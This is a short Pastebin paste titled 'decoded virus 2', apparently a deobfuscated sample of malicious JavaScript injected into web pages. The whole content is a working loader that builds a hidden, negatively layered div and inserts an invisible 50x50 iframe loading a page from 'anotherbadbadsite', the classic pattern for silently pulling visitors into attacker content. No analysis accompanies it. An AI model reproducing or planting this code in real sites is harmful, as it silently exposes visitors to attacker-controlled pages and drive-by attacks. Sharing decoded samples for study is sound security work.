Advertisement
Distortriver

decoded virus 2

Mar 5th, 2012
1,242
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. (function() {
  2.  
  3.     var url = "http://anotherbadbadsite/index.php?144993452d8c92b9ff23e2b7adfdd683";
  4.  
  5.     var node = document.createElement("div");
  6.  
  7.     node.style.zIndex = -10000;
  8.  
  9.     node.style.visibility = 'hidden';
  10.  
  11.     node.style.position = 'absolute';
  12.  
  13.     node.style.width = '50px';
  14.  
  15.     node.style.height = '50px';
  16.  
  17.     node.innerHTML = "<iframe width='50' height='50' frameborder='0' scrolling='no' src='" + url + "'></iframe>";
  18.  
  19.     document.body.appendChild(node);
  20.  
  21. })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement